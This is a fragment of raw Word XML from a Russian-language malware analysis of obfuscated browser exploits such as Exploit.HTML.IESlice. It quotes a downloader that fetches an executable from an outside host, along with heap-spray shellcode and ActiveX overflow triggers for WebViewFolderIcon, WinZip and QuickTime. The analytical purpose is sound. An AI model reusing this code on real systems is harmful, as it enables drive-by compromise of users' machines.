          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Пытаясь использовать уязвимости в Интернет браузерах, хакеры прилагают усилия для скрытия вредоносного кода с помощью различных способов обфускации, тем самым, усложняя процесс создания сигнатур. Такой скрипт, как правило, загружает другую вредоносную программу на компьютер польз</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="58"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="58"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>вателя.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3733800" cy="47396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33800" cy="4739640"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pP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 xml:space="preserve">kyjkidk </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="55"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="55"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>"G"+p+ "E"+p+ "T";</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var neuh = "</w:t>
      </w:r>
      <w:hyperlink r:id="rId120" w:history="1">
        <w:r w:rsidRPr="00FF38D0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>http://masiv.info/index.php?a=3&amp;c=3</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="55"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>";</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txnrlaa = "X"+p+ "MLHTT"+p+ "P";</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var byzqpd = anwnuo.CreateObject("Scripting. "+p+"File"+p+ "SystemObject", "")</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xkb = "She"+p+ "ll";</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sdk = "AD "+p+ "O "+p+ "DB ";</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xlnpl = "kfhnbue"+".exe";</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wxjxlg = ".";</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drogq = "G"+p+"ET";</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fzsadl = "A "+p+ "pp"+p+ "l"+p+ "ica"+p+ "t"+p+ "i "+p+ "o"+p+ "n"; ioqdw = ".";</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fvmdf = "S"+p+ "tre "+p+ "a"+p+ "m "; bhardg = "MSX"+p+ "ML2";</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var lldwnqj = izthzbn(anwnuo, xkb+wxjxlg+fzsadl); wsuvvey = "M"+p+ "ic"+p+ "ro"+p+ "s"+p+ "oft";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="510"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rStyle w:val="58"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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8"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>С целью скрытия опасного функционала скриптов применяются следующие методы:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="510"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="58"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="58"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">HTML </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="58"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>утилиты шифрования</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="510"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="58"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> разбивка строк</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="510"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="58"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> продвинутые протекторы</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8"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Что касается первого метода, множество таких утилит широко доступно в Интернете (например, </w:t>
      </w:r>
      <w:hyperlink r:id="rId121" w:history="1">
        <w:r w:rsidRPr="006E1E7E">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:lang w:eastAsia="en-US"/>
          </w:rPr>
          <w:t>http://www.iwebtool.com/html_encrypter</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="58"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>):</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8"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Пример разбивки строк показан ниже на примере </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="58"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Exploit.HTML.IESlice.p:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pP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4"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">cxawh </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="124"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>= 7+6+1+1+3+6+2+1;</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4"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">nvueig </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="124"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="124"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>"G"+p+"ET";</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4"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ujzsd = "X"+p+ "ML "+p+ "HTTP ";</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4"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>var ulgaiur = izthzbn(anwnuo, sdk+ioqdw+fvmdf);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="1210"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="124"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>evu = "MSXML "+p+ "2 ";</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Но наибольший интерес вызывают случаи, когда код скрыт с помощью специальных шифрующих процедур. Для этого рассмотрим код </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Exploit.HTML.IESlice.h:</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4"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt; </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="64"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Script Language=JavaScript’&gt; document. write (</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="610"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="64"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>unescape(%3C% 73%63%72%69...));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="610"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="64"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>zX( %</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="64pt"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="64"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2A 8Hxhwnuy% 2A 75qfslzflj%2A8IOf% 7BfXhwnuy%2A8Jkzshynts%2A 75ih%2A 7%3D% 7D%2A 7%3E %2A%3CG%7Bfw%2A75q%2A8I</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="620"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">... </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="64"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>');</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4"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>&lt;/Script&gt;</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Здесь мы видим строку </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="56"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>unescape</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="56"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>('%3</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="56"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="56"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>%73%63%72%69...'),</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">которая заключает в себе код </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">zX </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>функции, которая выполняет процедуру шифрования. После чего следует соответствующий ее вызов с целью извлечь реальное содержимое скрипта:</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&lt;html&gt;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&lt;head&gt;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&lt;title&gt;&lt;/title&gt;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&lt;script language="JavaScript"&gt;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memory = new Array(); var mem_flag = 0;</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having() { memory=memory; setTimeout("having() ", 2000);}</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getSpraySlide(spraySlide, spraySlideSize)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while (spraySlide. length *2&lt;spraySlideSize)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{spraySlide += spraySlide;}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spraySlide = spraySlide.substring(0,spraySlideSize/2); return spraySlide;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makeSlide()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heapSprayToAddress = 0x0c0c0c0c;</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payLoadCode = unescape(''%u4343%u4343%u0feb%u335b%u66c9%u80b9%u8001%uef33''+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heapBlockSize = 0x400000;</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payLoadSize = payLoadCode. length * 2;</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spraySlideSize = HeapBlockSize - (payLoadSize+0x38);</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spraySlide = unescape("%u0c0c%u0c0c");</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lastRenderedPageBreak/>
        <w:t>spraySlide = getSpraySlide(spraySlide,spraySlideSize); heapBlocks = (heapSprayToAddress - 0x400000)/HeapBlockSize;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for (i=0;i&lt;heapBlocks;i++)</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memory[i] = spraySlide + payLoadCode;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mem_flag = 1; having(); return memory;</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startWVF()</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for (i=0;i&lt;128;i++)</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vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>tr</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="132"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>y</w:t>
      </w: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tar = new ActiveXObjectfWebVi'+ 'ewFol'+ 'derlc'+ 'on. WebVi'+ 'ewFol'+ 'derl'+ 'con. 1'); d = 0x7ffffffe; b = 0x0c0c0c0c tar.setSlice(d, b, b, b );</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}catch(e){}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r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="132"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>function startWinZip(object)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xh = 'A';</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while (xh.length &lt; 231) xh+='A'; xh+="\x0c \x0c \x0c \x0c \x0c \x0c \x0c"; object. CreateNewFolderFromName(xh);</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startOverflow(num)</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(num == 0)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tr</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="132"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">y </w:t>
      </w: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qt = new ActiveXObject('QuickTime.QuickTime');</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if (qt)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qthtml = '&lt;object CLASSID="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B " width="1" height= ”1” style=''border:0px"&gt;'+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'&lt;param name="src" value="qt.php"&gt;'+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'&lt;param name="autoplay” value="true"&gt;'+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'&lt;param name=''loop" value=''false"&gt;'+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'&lt;param name=”controller” value="true"&gt;'+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'&lt;/object&gt;';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mem_flag) makeSlide();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document.getElementById('mydiv').innerHTML = qthtml; num = 255;</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catch(e)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(num = 255) setTimeout('startOverflow(1)'', 2000); else startOverflow(1);</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else if (num == 1) { try {</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winzip = document.createElementC'object");</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winzip.setAttribute("classid", "clsid:A09AE68F-B14D-43ED-B713-</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="132"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>BA413F034904");</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ret=winzip.CreateNewFolderFromName(unescape("%00")); if (ret == false)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mem_flag) makeSlide(); startWinZip(winzip); num = 255;</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catch(e)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(num = 255) setTimeout('startOverflow(2)'', 2000); else startOverflow(2);</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else if (num == 2)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try {</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tar = new ActiveXObject('WebVi'+ 'ewFol'+ 'derIc'+ 'on. WebVi'+ 'ewFol'+ 'derI'+ 'con. 1'); if (tar)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mem_flag) makeSlide(); startWVF();</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catch(e)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GetRandString(len)</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chars = "abcdefghiklmnopqrstuvwxyz";</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string_length = len;</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randomstring =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for (var i=0; i&lt;string_length; i++)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rnum = Math.floorMath.random() * chars.length); randomstring += chars.substring(rnum,rnum+1);</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return randomstring;</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CreateObject(CLSID, name) { var r = null;</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try {eval('r = CLSID.CreateObject(name)')}catch(e){}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r) {try {evalfr = CLSID.CreateObject(name, '"')') }catch(e){} }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="131"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rStyle w:val="132"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="132"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>if (! r) {try {evalfr = CLSID.CreateObject(name, "", '"')') }catch(e){} }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="131"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rStyle w:val="132"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pP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xml:space="preserve">if </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="132"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">(! </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="132"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">r) </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="132"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
